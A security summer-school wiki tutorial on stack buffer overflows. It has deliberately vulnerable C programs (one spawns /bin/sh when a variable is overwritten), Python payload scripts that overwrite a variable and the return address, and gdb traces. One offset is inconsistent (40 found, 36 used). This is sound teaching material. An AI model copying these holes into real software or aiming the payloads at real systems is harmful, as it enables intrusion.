User Tools

Site Tools


session:06

Differences

This shows you the differences between two versions of the page.


session:06 [2020/07/19 09:49] (current) – external edit 127.0.0.1
Line 1: Line 1:
 +====== 0x05. Buffer Exploitation ======
  
 +===== Resources =====
 +
 +[[https://security.cs.pub.ro/summer-school/res/slides/06-buffer-management.pdf|Session 5 slides]]
 +
 +[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|Session's tutorials and challenges archive]]
 +
 +[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|Session's code snippets]].
 +
 +/*[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-full.zip|Session's solutions]]*/
 +
 +===== Tutorials =====
 +
 +===== Buffers =====
 +
 +A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes.
 +
 +In C, we can declare a buffer of bytes as a char array, as follows:
 +
 +<code c>
 +char local_buffer[32];
 +</code>
 +
 +Which results in the following assembly code:
 +
 +<code objdump>
 +080483db <main>:
 + 80483db: 55                    push   ebp
 + 80483dc: 89 e5                mov    ebp,esp
 + 80483de: 83 ec 20              sub    esp,0x20
 + 80483e1: b8 00 00 00 00        mov    eax,0x0
 + 80483e6: c9                    leave  
 + 80483e7: c3                    ret 
 +</code>
 +
 +Notice that buffer allocation is done by simply subtracting its intended size from the current stack pointer (''sub esp, 0x20''). This simply reserves space on the stack (remember that on x86 the stack grows "upwards", from higher addresses to lower ones).
 +
 +<note>
 +A compiler may allocate more space on the stack than explicitly required. For example, on a 64-bit machine with stack canary enabled (an additional 64-bit value is implicitly placed between buffers and the return address - more on that in future sessions), declaring either ''char s[32]'' or ''char s[40]'' might yield ''sub rsp, 0x30'' to align buffers at 16 bytes thresholds.
 +
 +To exploit a program, the C source code may not be a good enough reference point. Only disassembling the executable will provide relevant information.
 +</note>
 +
 +Buffers can be also be stored in other places in memory, such as the ''heap'', ''.bss'' or ''.rodata''.
 +
 +You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffers/buffers.c''). 
 +<code c buffers.c>
 +#include <stdio.h>
 +#include <stdlib.h>
 +
 +char g_buf_init_zero[32] = {0};
 +/* g_buf_init_vals[5..31] will be 0 */
 +char g_buf_init_vals[32] = {1, 2, 3, 4, 5};
 +const char g_buf_const[32] = "Hello, world\n";
 +
 +int main(void)
 +{
 + char l_buf[32];
 + static char s_l_buf[32];
 + char *heap_buf = malloc(32);
 +
 + free(heap_buf);
 +
 + return 0;
 +}
 +</code>
 +
 +Let's have a look at the executable sections:
 +<code bash>
 +$ readelf -S buffers
 +  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
 +...
 +  [16] .rodata           PROGBITS        080485a0 0005a0 000040 00    0   0 32
 +...
 +  [24] .data             PROGBITS        0804a020 001020 000040 00  WA  0   0 32
 +  [25] .bss              NOBITS          0804a060 001060 000060 00  WA  0   0 32
 +...
 +Key to Flags:
 +  W (write)
 +  A (alloc)
 +</code>
 +And the address of each symbol (buffer in this case):
 +<code bash>
 +080485c0 R g_buf_const
 +0804a040 D g_buf_init_vals
 +0804a080 B g_buf_init_zero
 +0804a0a0 b s_l_buf.2387
 +
 +Key to Flags:
 +  R (symbol is read-only)
 +  D (symbol in initialized data section)
 +  B (symbol in BSS data section)
 +  
 +  Uppercase and lowercase flags have the same meaning.
 +  A lowercase flag means variable is not visible outside the module
 +</code>
 +
 +Alternatively, you can use gdb to extract information on each symbol:
 +<code bash>
 +gdb-peda$ p &g_buf_const
 +$1 = (<data variable, no debug info> *) 0x80485c0 <g_buf_const>
 +</code>
 +
 +Using this information you can map each symbol to a data section.
 +For example, the address of g_buf_const is ''0x80485c0'', so it is placed
 +in the .rodata section ''addr=0x080485a0; size=0x40''.
 +
 +Non-static local variables and dynamically allocated buffers cannot be
 +seen in the executable (they have meaning only at runtime, because they are
 +allocated on the stack or heap when the code reaches a certain point. Let's
 +inspect the execution right before calling free() and see where the heap
 +buffer will be placed:
 +<code bash>
 +gdb-peda$ 
 +----------------------------------registers-----------------------------------]
 +EAX: 0x804b160 --> 0x0 
 +EBX: 0x0 
 +ECX: 0x21e79 
 +EDX: 0x804b160 --> 0x0 
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0xffffd798 --> 0x0 
 +ESP: 0xffffd750 --> 0x804b160 --> 0x0 
 +EIP: 0x80484e8 (<main+50>: call   0x8048350 <free@plt>)
 +EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +   0x80484df <main+41>: mov    DWORD PTR [ebp-0x30],eax
 +   0x80484e2 <main+44>: sub    esp,0xc
 +   0x80484e5 <main+47>: push   DWORD PTR [ebp-0x30]
 +=> 0x80484e8 <main+50>: call   0x8048350 <free@plt>
 +   0x80484ed <main+55>: add    esp,0x10
 +   0x80484f0 <main+58>: mov    eax,0x0
 +   0x80484f5 <main+63>: mov    edx,DWORD PTR [ebp-0xc]
 +   0x80484f8 <main+66>: xor    edx,DWORD PTR gs:0x14
 +Guessed arguments:
 +arg[0]: 0x804b160 --> 0x0 
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd750 --> 0x804b160 --> 0x0 
 +0004| 0xffffd754 --> 0xffffd9e0 ("examples/buffers")
 +0008| 0xffffd758 --> 0xf7e0f049 (add    ebx,0x1a4fb7)
 +0012| 0xffffd75c --> 0xf7fb7748 --> 0x0 
 +0016| 0xffffd760 --> 0xf7fb4000 --> 0x1d4d6c 
 +0020| 0xffffd764 --> 0xf7fb4000 --> 0x1d4d6c 
 +0024| 0xffffd768 --> 0x804b160 --> 0x0 
 +0028| 0xffffd76c --> 0xf7e0f1ab (add    esp,0x10)
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +
 +gdb-peda$ x/wx $ebp-0x30
 +0xffffd768: 0x0804b160
 +gdb-peda$ vmm
 +Start      End        Perm Name
 +...
 +0x0804b000 0x0806d000 rw-p [heap]
 +...
 +</code>
 +
 +The gdb-peda ''vmm'' command displays the virtual memory map of the process;
 +this can be used to easily inspect the addresses and permissions of each memory region.
 +
 +You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''init_buffer/init_buffer.c'').
 +
 +Let's fill our stack buffer with some values and disassemble the binary:
 +
 +<code c init_buffer.c>
 +char local_buffer[32];
 +unsigned int i = 0;
 +
 +for (i = 0; i < 32; i++) {
 +    local_buffer[i] = i;
 +}
 +</code>
 +
 +<code objdump>
 +080483db <main>:
 + 80483db:       55                      push   ebp
 + 80483dc:       89 e5                   mov    ebp,esp
 + 80483de:       83 ec 24                sub    esp,0x24                      ; reserve space for both the local_buffer (0x20) and i (0x4)
 + 80483e1:       c7 45 fc 00 00 00 00    mov    DWORD PTR [ebp-0x4],0x0       ; initialize i
 + 80483e8:       c7 45 fc 00 00 00 00    mov    DWORD PTR [ebp-0x4],0x0       ; redundant unoptimized compiler logic
 + 80483ef:       eb 13                   jmp    8048404 <main+0x29>           ; goto the end of loop
 + 80483f1:       8b 45 fc                mov    eax,DWORD PTR [ebp-0x4]       ; get value of 'i' in eax
 + 80483f4:       89 c1                   mov    ecx,eax                       ; save 'i' in ecx
 + 80483f6:       8d 55 dc                lea    edx,[ebp-0x24]                ; load the address of 'local_buffer' in edx
 + 80483f9:       8b 45 fc                mov    eax,DWORD PTR [ebp-0x4]       ; get 'i'
 + 80483fc:       01 d0                   add    eax,edx                       ; compute address of 'local_buffer+i' in eax
 + 80483fe:       88 08                   mov    BYTE PTR [eax],cl             ; store 'i' at *(local_buffer+i)
 + 8048400:       83 45 fc 01             add    DWORD PTR [ebp-0x4],0x1       ; increment 'i'
 + 8048404:       83 7d fc 1f             cmp    DWORD PTR [ebp-0x4],0x1f      ; 'i==31'?
 + 8048408:       76 e7                   jbe    80483f1 <main+0x16>           ; continue loop if below or equal or fall through if above
 + 804840a:       b8 00 00 00 00          mov    eax,0x0
 + 804840f:       c9                      leave  
 + 8048410:       c3                      ret
 +</code>
 +
 +Notice that now we subtract ''0x24'' from the stack pointer, since this time we also need to reserve space for the ''unsigned integer'' used as an index.
 +
 +Similar to how arguments are referenced using ''ebp'', so are the local variables. Since in most cases the value of ''ebp'' stays fixed throughout the execution of a function, you can easily track local variables and buffers by mapping names to offsets (i.e. 'i' to '-0x4', 'local_buffer' to '-0x24' and so on). Intermediary positions within the buffer are almost always computed by using the base address and adding an offset to it.
 +
 +<note>
 +Values at offsets relative to ''ebp'' have their meaning defined by their use, instead of static names. This implies that even if the allocated space is 0x24, the compiler may
 +reorder local buffers, and space may be interpreted as either 'i' at 'ebp-0x4' and 'local_buffer' at 'ebp-0x24', or 'i' at 'ebp-0x24' and 'local_buffer' at 'ebp-0x20'.
 +</note>
 +
 +Finally, lets add one more interesting change to our code:
 +
 +<code c>
 +char local_buffer2[30];
 +char local_buffer[2];
 +unsigned int i = 0;
 +
 +for (i = 0; i < 32; i++) {
 +    local_buffer[i] = i;
 +}
 +</code>
 +
 +Can you guess how the resulting code will look like, disassembled? Where are we writing to?
 +
 +==== Stack buffer overflows ====
 +
 +As we have seen in previous sessions, the stack serves multiple purposes:
 +  * Passing function arguments from the caller to the callee
 +  * Storing local variables for functions
 +  * Temporarily saving register values before a call
 +  * Saving the return address and old frame pointer
 +
 +Our previous example clearly showcases the fact that even though in an abstract sense, different buffers are separate from one another, ultimately they are just some regions of memory which do not have any intrinsic identification or associated size. This is the reason why in some higher level languages it is not possible to write beyond the bounds of containers - the size is integrated into the object itself.
 +
 +But in our case, bounds are unchecked, therefore it is up to the programmer to code carefully. This includes checking for any overflows and using **safe functions**. Unfortunately, many functions in the standard C library, particularly those which work with strings and read user input, are unsafe - nowadays, the compiler will issue warnings when encountering them.
 +
 +What can happen in the event that we write outside the bounds of a stack buffer?
 +
 +You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow/buffer_overflow.c'').
 +<code c buffer_overflow.c>
 +void f(char *buf)
 +{
 +    unsigned int i = 0;
 +
 +    for (i = 0; i < 100; i++) {
 +        buf[i] = i;
 +    }
 +}
 +
 +int main(int argc, char* argv[])
 +{
 +    char local_buffer[32];
 +    f(local_buffer);
 +
 +    return 0;
 +}
 +</code>
 +
 +<code gdb>
 +$ ./buffer_overflow 
 +Segmentation fault (core dumped)
 +</code>
 +
 +What happened? Let's try to find the cause starting with the call of ''f'':
 +
 +<code gdb>
 +gdb-peda$ b *0x08048430
 +Breakpoint 1 at 0x8048430
 +
 +gdb-peda$ r
 +[----------------------------------registers-----------------------------------]
 +EAX: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 +EBX: 0x0 
 +ECX: 0x38f575fd 
 +EDX: 0xffffd684 --> 0x0 
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0xffffd658 --> 0x0 
 +ESP: 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 +EIP: 0x8048430 (<main+10>: call   0x80483f6 <f>)
 +EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +   0x8048429 <main+3>: sub    esp,0x20
 +   0x804842c <main+6>: lea    eax,[ebp-0x20]
 +   0x804842f <main+9>: push   eax
 +=> 0x8048430 <main+10>: call   0x80483f6 <f>
 +   0x8048435 <main+15>: add    esp,0x4
 +   0x8048438 <main+18>: mov    eax,0x0
 +   0x804843d <main+23>: leave  
 +   0x804843e <main+24>: ret
 +Guessed arguments:
 +arg[0]: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 +arg[1]: 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 +0004| 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 +0008| 0xffffd63c --> 0x8048461 (<__libc_csu_init+33>: lea    eax,[ebx-0xf4])
 +0012| 0xffffd640 --> 0xf7fe59b0 (push   ebp)
 +0016| 0xffffd644 --> 0x0 
 +0020| 0xffffd648 --> 0x8048449 (<__libc_csu_init+9>: add    ebx,0x1bb7)
 +0024| 0xffffd64c --> 0x0 
 +0028| 0xffffd650 --> 0xf7fb4000 --> 0x1d4d6c 
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +
 +Breakpoint 1, 0x08048430 in main ()
 +
 +gdb-peda$ ni
 +[----------------------------------registers-----------------------------------]
 +EAX: 0xffffd69b --> 0x63 ('c')
 +EBX: 0x0 
 +ECX: 0x38f575fd 
 +EDX: 0x63 ('c')
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0xffffd658 (" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +ESP: 0xffffd634 --> 0xffffd638 --> 0x3020100 
 +EIP: 0x8048435 (<main+15>: add    esp,0x4)
 +EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +   0x804842c <main+6>: lea    eax,[ebp-0x20]
 +   0x804842f <main+9>: push   eax
 +   0x8048430 <main+10>: call   0x80483f6 <f>
 +=> 0x8048435 <main+15>: add    esp,0x4
 +   0x8048438 <main+18>: mov    eax,0x0
 +   0x804843d <main+23>: leave  
 +   0x804843e <main+24>: ret    
 +   0x804843f: nop
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd634 --> 0xffffd638 --> 0x3020100 
 +0004| 0xffffd638 --> 0x3020100 
 +0008| 0xffffd63c --> 0x7060504 
 +0012| 0xffffd640 --> 0xb0a0908 
 +0016| 0xffffd644 --> 0xf0e0d0c 
 +0020| 0xffffd648 --> 0x13121110 
 +0024| 0xffffd64c --> 0x17161514 
 +0028| 0xffffd650 --> 0x1b1a1918 
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +0x08048435 in main ()
 +
 +gdb-peda$ b *0x0804843e
 +Breakpoint 2 at 0x0804843e
 +
 +gdb-peda$ c
 +Continuing.
 +[----------------------------------registers-----------------------------------]
 +EAX: 0x0 
 +EBX: 0x0 
 +ECX: 0x38f575fd 
 +EDX: 0x63 ('c')
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0x23222120 (' !"#')
 +ESP: 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +EIP: 0x804843e (<main+24>: ret)
 +EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +   0x8048435 <main+15>: add    esp,0x4
 +   0x8048438 <main+18>: mov    eax,0x0
 +   0x804843d <main+23>: leave  
 +=> 0x804843e <main+24>: ret    
 +   0x804843f: nop
 +   0x8048440 <__libc_csu_init>: push   ebp
 +   0x8048441 <__libc_csu_init+1>: push   edi
 +   0x8048442 <__libc_csu_init+2>: push   esi
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0004| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0008| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0012| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0016| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0020| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0024| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0028| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +
 +Breakpoint 2, 0x0804843e in main ()
 +
 +gdb-peda$ ni
 +[----------------------------------registers-----------------------------------]
 +EAX: 0x0 
 +EBX: 0x0 
 +ECX: 0x38f575fd 
 +EDX: 0x63 ('c')
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0x23222120 (' !"#')
 +ESP: 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +EIP: 0x27262524 ("$%&'")
 +EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +Invalid $PC address: 0x27262524
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0004| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0008| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0012| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0016| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0020| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0024| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0028| 0xffffd67c ("DEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +0x27262524 in ?? ()
 +</code>
 +
 +It seems that the return address of ''main'', along with a lot more of the stack, gets overwritten with the characters that we write "in the buffer". The program then tries to "return to $%&'" ($%&' is the ASCII representation of little endian 0x27262524), which is an unmapped address. This ultimately triggers a page fault, upon which the operating system signals a ''SIGSEGV'' and terminates the process.
 +
 +<note important>
 +A buffer overflow is an anomaly caused by writing beyond the bounds of a buffer; it is not necessarily a vulnerability. The presence of a buffer overflow can lead to strange behavior, a crash, arbitrary code execution or absolutely **nothing**.
 +</note>
 +
 +==== Diverting code execution ====
 +
 +We attempted to use the wonderful ''gets'' function, but the compiler does not generate it and the man page explicitly says:
 +
 +<file>
 +DESCRIPTION
 +       Never use this function.
 +
 +       gets()  reads  a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a
 +       null byte ('\0').  No check for buffer overrun is performed (see BUGS below).
 +</file>
 +
 +However, we can still handcraft our own vulnerable scenario. Let's try to divert the code execution by using a buffer overflow vulnerability.
 +
 +You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow_var/buffer_overflow_var.c'').
 +
 +<code c buffer_overflow_var.c>
 +#include <stdio.h>
 +#include <stdlib.h>
 +
 +void f(char* buf) {
 +
 +    fgets(buf, 100, stdin);
 +}
 +
 +int main(int argc, char* argv[])
 +{
 +    int critical_variable = 0;
 +    char local_buffer[32];
 +    f(local_buffer);
 +
 +    if (critical_variable == 1337) {
 +        printf("Oh dear, you shouldn't be here!\n");
 +        system("/bin/sh");
 +    }
 +    
 +    return 0;
 +}
 +</code>
 +
 +Our ''local_buffer'' is dangerously close to that critical variable. Let's see if we can overwrite it. We need 32 bytes of input to fill our buffer + 4 bytes for the integer.
 +
 +<code bash>
 +$ python -c "print 'A'*32 + '1337'" | ./buffer_overflow_var
 +</code>
 +
 +Nothing happened. Let's find out why. We'll save our payload to a file and run ''buffer_overflow_var'' under gdb, using the file as input:
 +
 +<code bash>
 +$ python -c "print 'A'*32 + '1337'" > payload
 +$ gdb ./buffer_overflow_var
 +gdb-peda$ b *0x80484fc
 +Breakpoint 1 at 0x80484fc
 +
 +gdb-peda$ r < payload
 +Starting program: ./buffer_overflow_var < payload
 +
 +[----------------------------------registers-----------------------------------]
 +EAX: 0xffffd5dc ('A' <repeats 32 times>, "1337\n")
 +EBX: 0x0 
 +ECX: 0xf7fb589c --> 0x0 
 +EDX: 0xffffd5dc ('A' <repeats 32 times>, "1337\n")
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0xffffd608 --> 0x0 
 +ESP: 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c 
 +EIP: 0x80484fc (<main+39>: cmp    DWORD PTR [ebp-0xc],0x539)
 +EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +   0x80484f3 <main+30>: push   eax
 +   0x80484f4 <main+31>: call   0x80484b6 <f>
 +   0x80484f9 <main+36>: add    esp,0x10
 +=> 0x80484fc <main+39>: cmp    DWORD PTR [ebp-0xc],0x539
 +   0x8048503 <main+46>: jne    0x8048525 <main+80>
 +   0x8048505 <main+48>: sub    esp,0xc
 +   0x8048508 <main+51>: push   0x80485c0
 +   0x804850d <main+56>: call   0x8048360 <puts@plt>
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c 
 +0004| 0xffffd5d4 --> 0xf7fb4000 --> 0x1d4d6c 
 +0008| 0xffffd5d8 --> 0x0 
 +0012| 0xffffd5dc ('A' <repeats 32 times>, "1337\n")
 +0016| 0xffffd5e0 ('A' <repeats 28 times>, "1337\n")
 +0020| 0xffffd5e4 ('A' <repeats 24 times>, "1337\n")
 +0024| 0xffffd5e8 ('A' <repeats 20 times>, "1337\n")
 +0028| 0xffffd5ec ('A' <repeats 16 times>, "1337\n")
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +
 +Breakpoint 1, 0x080484fc in main ()
 +
 +gdb-peda$ x/wx $ebp-0xc
 +0xffffd5fc: 0x37333331
 +gdb-peda$ x/s $ebp-0xc
 +0xffffd5fc: "1337\n"
 +</code>
 +
 +<note tip>
 +We usually use high level scripting languages, such as **python** to craft payloads. For example, to generate 32 ''A''s, we just use '''A'*32''.
 +</note>
 +
 +We can observe two things:
 +  * We actually wrote the __string__ ''1337'', which is ''0x37333331'', instead of the actual value ''1337'' or ''0x539'' in hex.
 +  * We missed the fact that x86 is Little Endian, meaning that we should write the integer value into memory starting with the least significant byte first.
 +
 +An easy way to overcome this is to write a small script which will generate the required payload for us, as follows:
 +
 +<code python>
 +#!/usr/bin/env python
 +import struct
 +
 +buflen = 32
 +
 +payload = 'A' * buflen
 +payload += struct.pack('<I', 1337)
 +
 +open('payload', 'w').write(payload)
 +</code>
 +
 +Note the use of ''struct.pack'' and ''struct.unpack'' when working with binary data that needs to be stored in various configurations.
 +
 +Let's test our new payload:
 +
 +<code>
 +$ cat payload | ./buffer_overflow_var 
 +Oh dear, you shouldn't be here!
 +</code>
 +
 +It seems to alter the code flow as we wanted to, but it doesn't seem to spawn a (new) shell. What gives? The gist of the issue is the fact that the binary reads from ''stdin'' in one "chomp". Our newly spawned shell has no input to read, and exits before we get a change to input any commands (similarly to how the shell behaves when sending ''Ctrl-D'' - ''end of input''. We can use the following clever trick to keep ''stdin'' open for further user interaction:
 +
 +<code>
 +$ cat payload - | ./buffer_overflow_var
 +Oh dear, you shouldn't be here!
 +date
 +Tue Jun 27 22:17:48 EEST 2017
 +whoami
 +root
 +</code>
 +
 +<note tip>
 +We used the ''cat filename -| ./binary'' trick to concatenate the contents of ''filename'' with the ''standard input''. Once EOF is reached, you can continue feeding data to the binary via the standard input.
 +</note>
 +
 +==== Overwriting the stored return address ====
 +
 +Let's wrap up our stack smashing adventure by changing the code flow through overwriting the return address stored on the stack.
 +
 +You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow_ret/buffer_overflow_ret.c'').
 +
 +<code c buffer_overflow_ret.c>
 +#include <stdio.h>
 +
 +void win()
 +{
 +    printf("Well done!\n");
 +}
 +
 +void f()
 +{
 +    printf("Nothing to see here\n");
 +}
 +
 +void get_message(char *buf)
 +{
 +    fgets(buf, 100, stdin);
 +}
 +
 +int main(int argc, char* argv[])
 +{
 +    char local_buffer[32];
 +
 +    printf("Please leave a message: ");
 +    get_message(local_buffer);
 +
 +    f();
 +
 +    return 0;
 +}
 +</code>
 +
 +First, let's trigger the program to crash like in the previous example:
 +
 +<code bash>
 +$ ./buffer_overflow_ret 
 +Please leave a message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 +Nothing to see here
 +Segmentation fault (core dumped)
 +</code>
 +
 +However, we do not know at which point relative to the start of our buffer the saved return address gets overwritten. We can either compute it by looking at the disassembly and the stack layout or by using a De Bruijn pattern in PEDA. Such a pattern contains unique groups of 4 characters, meaning that each group will have a unique offset within the pattern.
 +
 +<code bash>
 +$ gdb ./buffer_overflow_ret 
 +gdb-peda$ pattc 100
 +'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
 +gdb-peda$ r
 +Starting program: ./buffer_overflow_ret
 +Please leave a message: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALL
 +Nothing to see here
 +
 +Program received signal SIGSEGV, Segmentation fault.
 +
 +[----------------------------------registers-----------------------------------]
 +EAX: 0x0 
 +EBX: 0x0 
 +ECX: 0x804b160 ("Nothing to see here\nge: ")
 +EDX: 0xf7fb5890 --> 0x0 
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0x61414145 ('EAAa')
 +ESP: 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +EIP: 0x41304141 ('AA0A')
 +EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +Invalid $PC address: 0x41304141
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +0004| 0xffffd624 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +0008| 0xffffd628 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +0012| 0xffffd62c ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +0016| 0xffffd630 ("2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +0020| 0xffffd634 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +0024| 0xffffd638 ("A3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +0028| 0xffffd63c ("IAAeAA4AAJAAfAA5AAKAAgAA6AA")
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +Stopped reason: SIGSEGV
 +0x41304141 in ?? ()
 +
 +gdb-peda$ patto AA0A
 +AA0A found at offset: 40
 +</code>
 +
 +This tells us that we need to write 40 characters into the buffer and then the next 4 bytes will overwrite the return address. Let's test this, again, by writing a script that can generate a payload, which we can easily tailor to our needs. First, let's see if we can reliably change the value of the return address. We'll attempt to write ''0xdeadbeef'' first.
 +
 +<code python>
 +#!/usr/bin/env python
 +import struct
 +
 +payload = 'A' * 36
 +payload += struct.pack('<I', 0xdeadbeef)
 +
 +open('payload', 'w').write(payload)
 +</code>
 +
 +<code bash>
 +gdb-peda$ r < payload
 +Starting program: ./buffer_overflow_ret < payload
 +Please leave a message: Nothing to see here
 +
 +Program received signal SIGSEGV, Segmentation fault.
 +
 +[----------------------------------registers-----------------------------------]
 +EAX: 0x0 
 +EBX: 0x0 
 +ECX: 0x804b160 ("Please leave a message: Nothing to see here\n")
 +EDX: 0xf7fb5890 --> 0x0 
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0x61616161 ('aaaa')
 +ESP: 0xffffd620 --> 0x0 
 +EIP: 0xdeadbeef
 +EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +Invalid $PC address: 0xdeadbeef
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd620 --> 0x0 
 +0004| 0xffffd624 --> 0xffffd6b4 --> 0xffffd859 ("./buffer_overflow_ret")
